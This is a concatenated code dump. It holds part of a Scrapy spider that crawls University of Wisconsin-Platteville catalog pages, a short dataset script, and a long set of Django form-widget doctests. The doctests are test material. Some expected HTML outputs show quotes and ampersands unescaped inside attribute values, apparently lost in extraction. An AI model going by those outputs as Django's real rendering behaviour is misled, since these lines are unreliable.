"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ENVHORT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ESL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ETHNSTDY", 
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FORENSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/FRENCH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GENENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOGRPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GEOLOGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/GERMAN", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HCA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HHP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/HISTORY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDSTENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/INDUSTDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/ISCM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/JAPANESE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MATH",
"https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MECHENG", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MEDIA", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MSNT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUAP", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/MUSIC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/OCL", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHLSPHY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHSC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PHYSICS", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/POLISCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PROJMGT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/PSYCHLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/RECLAM", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SCSCI", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SEJ", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOCIOLGY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SOFTWARE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPANISH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/SPEECH", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/STAT", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/TEACHING", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/THEATRE", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWC", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/UWPSTUDY", "https://passexpress.uwplatt.edu/app/catalog/listclasses/1080/WOMGENDR",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BIOLOGY/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/B/BUSADMIN/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CIVILENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/COMPUTER/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/C/CRIMLJUS/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GENENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/G/GEOGRPHY/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/GRAD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/UGRD", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XGR", "https://passexpress.uwplatt.edu/app/catalog/listCatalog/UWPLT/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ECONOMIC/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ENERGY/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/E/ETHNSTDY/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MATH/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MECHENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MEDIA/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/M/MUSIC/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/ACCTING/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/A/APC/XUG",
"https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDSTENG/XUG", "https://passexpress.uwplatt.edu/app/catalog/listCoursesBySubject/UWPLT/I/INDUSTDY/XUG",
]
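# NOTE: the start_urls above repeat two URL templates (listCoursesBySubject and
# listclasses) over a fixed set of subject codes. Rather than hand-maintaining the
# list, the same URLs can be generated. A sketch, using an abbreviated subject list
# copied from the entries above (the term code 1080 and base URL are taken verbatim
# from the list; build_urls is a hypothetical helper, not part of the spider):

```python
BASE = "https://passexpress.uwplatt.edu/app/catalog"

# Abbreviated subject codes copied from the hand-written list above.
SUBJECTS = ["ACCTING", "AGBUS", "BIOLOGY", "MATH", "PHYSICS"]

def build_urls(term="1080", careers=("UGRD",)):
    """Generate the two URL families used in start_urls."""
    urls = []
    for subj in SUBJECTS:
        # listCoursesBySubject groups each subject under its first letter.
        for career in careers:
            urls.append("{}/listCoursesBySubject/UWPLT/{}/{}/{}".format(
                BASE, subj[0], subj, career))
        urls.append("{}/listclasses/{}/{}".format(BASE, term, subj))
    return urls
```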
def start_requests(self):
    for u in self.start_urls:
        yield scrapy.Request(u, callback=self.parse_httpbin,
                             errback=self.errback_httpbin,
                             dont_filter=True)

def parse_httpbin(self, response):
    self.logger.info('Got successful response from {}'.format(response.url))
    items = PlatevilleLinksItem()
    links = response.xpath('//a/@href').extract()
    items['links'] = links
    yield items

def errback_httpbin(self, failure):
    # Log all failures.
    self.logger.error(repr(failure))

    # In case you want to do something special for some errors,
    # you may need the non-200 response.
    if failure.check(HttpError):
        # These exceptions come from the HttpError spider middleware;
        # the non-200 response is available on the failure value.
        response = failure.value.response
        self.logger.error('HttpError on %s', response.url)
    elif failure.check(DNSLookupError):
        # This is the original request.
        request = failure.request
        self.logger.error('DNSLookupError on %s', request.url)
    elif failure.check(TimeoutError, TCPTimedOutError):
        request = failure.request
        self.logger.error('TimeoutError on %s', request.url)
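# The errback above dispatches on the type of the wrapped exception via
# failure.check(...). The same dispatch logic can be sketched in plain Python
# (a hedged illustration only: these are stand-in exception classes and a
# hypothetical classify() helper, not Scrapy's or Twisted's actual Failure API):

```python
class HttpError(Exception):
    """Stand-in for scrapy.spidermiddlewares.httperror.HttpError."""

class DNSLookupError(Exception):
    """Stand-in for twisted.internet.error.DNSLookupError."""

def classify(exc):
    # Mirrors the errback's if/elif chain: return a label for the first
    # exception type that matches, like failure.check() does.
    if isinstance(exc, HttpError):
        return "http"
    if isinstance(exc, DNSLookupError):
        return "dns"
    if isinstance(exc, TimeoutError):
        return "timeout"
    return "other"
```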

# make_data.py (K-ona/Feature-Based-DL-Classifier, Apache-2.0)
from data import make_dataset
import numpy as np
make_dataset('./data/training_data/final_cleaned1.csv', './data/training_data/equal_data_all.csv')

# django/tests/regressiontests/forms/tests.py (jonaustin/advisoryscan, MIT)
# -*- coding: utf-8 -*-
from localflavor import localflavor_tests
from regressions import regression_tests
form_tests = r"""
>>> from django.newforms import *
>>> import datetime
>>> import time
>>> import re
>>> try:
... from decimal import Decimal
... except ImportError:
... from django.utils._decimal import Decimal
###########
# Widgets #
###########
Each Widget class corresponds to an HTML form widget. A Widget knows how to
render itself, given a field name and some data. Widgets don't perform
validation.
# TextInput Widget ############################################################
>>> w = TextInput()
>>> w.render('email', '')
u'<input type="text" name="email" />'
>>> w.render('email', None)
u'<input type="text" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="text" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="text" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="text" name="email" value="test@example.com" class="fun" />'
# Note that doctest in Python 2.4 (and maybe 2.5?) doesn't support non-ascii
# characters in output, so we're displaying the repr() here.
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="text" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = TextInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="text" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="text" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = TextInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="text" class="special" name="email" />'
# PasswordInput Widget ############################################################
>>> w = PasswordInput()
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="password" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="password" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="password" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = PasswordInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="password" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="password" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = PasswordInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="password" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="password" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
The render_value argument lets you specify whether the widget should render
its value. You may want to do this for security reasons.
>>> w = PasswordInput(render_value=True)
>>> w.render('email', 'secret')
u'<input type="password" name="email" value="secret" />'
>>> w = PasswordInput(render_value=False)
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'secret')
u'<input type="password" name="email" />'
>>> w = PasswordInput(attrs={'class': 'fun'}, render_value=False)
>>> w.render('email', 'secret')
u'<input type="password" class="fun" name="email" />'
# HiddenInput Widget ############################################################
>>> w = HiddenInput()
>>> w.render('email', '')
u'<input type="hidden" name="email" />'
>>> w.render('email', None)
u'<input type="hidden" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = HiddenInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="hidden" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
# MultipleHiddenInput Widget ##################################################
>>> w = MultipleHiddenInput()
>>> w.render('email', [])
u''
>>> w.render('email', None)
u''
>>> w.render('email', ['test@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', ['some "quoted" & ampersanded value'])
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />\n<input type="hidden" name="email" value="foo@example.com" />'
>>> w.render('email', ['test@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />\n<input type="hidden" name="email" value="foo@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'fun'})
>>> w.render('email', [])
u''
>>> w.render('email', ['foo@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
>>> w.render('email', ['foo@example.com', 'test@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />\n<input type="hidden" class="fun" value="test@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
>>> w.render('email', ['ŠĐĆŽćžšđ'], attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
# FileInput Widget ############################################################
>>> w = FileInput()
>>> w.render('email', '')
u'<input type="file" name="email" />'
>>> w.render('email', None)
u'<input type="file" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="file" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="file" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="file" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = FileInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="file" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="file" class="fun" value="foo@example.com" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="file" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
# Textarea Widget #############################################################
>>> w = Textarea()
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', None)
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', 'value')
u'<textarea rows="10" cols="40" name="msg">value</textarea>'
>>> w.render('msg', 'some "quoted" & ampersanded value')
u'<textarea rows="10" cols="40" name="msg">some "quoted" & ampersanded value</textarea>'
>>> w.render('msg', 'value', attrs={'class': 'pretty', 'rows': 20})
u'<textarea class="pretty" rows="20" cols="40" name="msg">value</textarea>'
You can also pass 'attrs' to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg" class="pretty"></textarea>'
>>> w.render('msg', 'example')
u'<textarea rows="10" cols="40" name="msg" class="pretty">example</textarea>'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '', attrs={'class': 'special'})
u'<textarea rows="10" cols="40" name="msg" class="special"></textarea>'
>>> w.render('msg', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<textarea rows="10" cols="40" name="msg" class="fun">\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</textarea>'
# CheckboxInput Widget ########################################################
>>> w = CheckboxInput()
>>> w.render('is_cool', '')
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', None)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', False)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', True)
u'<input checked="checked" type="checkbox" name="is_cool" />'
Using any value that's not in ('', None, False, True) will check the checkbox
and set the 'value' attribute.
>>> w.render('is_cool', 'foo')
u'<input checked="checked" type="checkbox" name="is_cool" value="foo" />'
>>> w.render('is_cool', False, attrs={'class': 'pretty'})
u'<input type="checkbox" name="is_cool" class="pretty" />'
You can also pass 'attrs' to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '')
u'<input type="checkbox" class="pretty" name="is_cool" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '', attrs={'class': 'special'})
u'<input type="checkbox" class="special" name="is_cool" />'
You can pass 'check_test' to the constructor. This is a callable that takes the
value and returns True if the box should be checked.
>>> w = CheckboxInput(check_test=lambda value: value.startswith('hello'))
>>> w.render('greeting', '')
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', 'hello')
u'<input checked="checked" type="checkbox" name="greeting" value="hello" />'
>>> w.render('greeting', 'hello there')
u'<input checked="checked" type="checkbox" name="greeting" value="hello there" />'
>>> w.render('greeting', 'hello & goodbye')
u'<input checked="checked" type="checkbox" name="greeting" value="hello & goodbye" />'
A subtlety: If the 'check_test' argument cannot handle a value and raises any
exception during its __call__, then the exception will be swallowed and the box
will not be checked. In this example, the 'check_test' assumes the value has a
startswith() method, which fails for the values True, False and None.
>>> w.render('greeting', True)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', False)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', None)
u'<input type="checkbox" name="greeting" />'
# Select Widget ###############################################################
>>> w = Select()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
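The selection rule shown above can be sketched as a one-line comparison; is_selected is an illustrative helper, not Django API:

```python
# An option is selected when the str() of the submitted value equals
# the str() of the option value -- so 2 and '2' are interchangeable,
# while a label like 'John' never matches the value 'J'.
def is_selected(option_value, submitted_value):
    return str(option_value) == str(submitted_value)
```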
The 'choices' argument can be any iterable:
>>> from itertools import chain
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> things = ({'id': 1, 'name': 'And Boom'}, {'id': 2, 'name': 'One More Thing!'})
>>> class SomeForm(Form):
...     somechoice = ChoiceField(choices=chain((('', '-'*9),), [(thing['id'], thing['name']) for thing in things]))
>>> f = SomeForm()
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f = SomeForm({'somechoice': 2})
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="">---------</option>\n<option value="1">And Boom</option>\n<option value="2" selected="selected">One More Thing!</option>\n</select></td></tr>'
You can also pass 'choices' to the constructor:
>>> w = Select(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
>>> w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select name="email">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
If choices is passed to the constructor and is a generator, it can be iterated
over multiple times without getting consumed:
>>> w = Select(choices=get_choices())
>>> print w.render('num', 2)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> print w.render('num', 3)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3" selected="selected">3</option>
<option value="4">4</option>
</select>
# NullBooleanSelect Widget ####################################################
>>> w = NullBooleanSelect()
>>> print w.render('is_cool', True)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', False)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
>>> print w.render('is_cool', None)
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '2')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '3')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
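The value handling implied by the output above can be sketched as a small normalization step; normalize is an illustrative name, not Django's internal helper:

```python
# True and '2' select "Yes", False and '3' select "No",
# and anything else falls back to "Unknown" ('1').
def normalize(value):
    if value is True or value == '2':
        return '2'
    if value is False or value == '3':
        return '3'
    return '1'
```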
# SelectMultiple Widget #######################################################
>>> w = SelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R" selected="selected">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G" selected="selected">George</option>
<option value="R">Ringo</option>
</select>
The values are compared to the choices via str(), so numbers and strings match:
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<select multiple="multiple" name="nums">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
You can also pass 'choices' to the constructor:
>>> w = SelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select multiple="multiple" name="nums">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
# RadioSelect Widget ##########################################################
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are checked:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are checked:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
The value is compared to the choices via str(), so numbers and strings match:
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
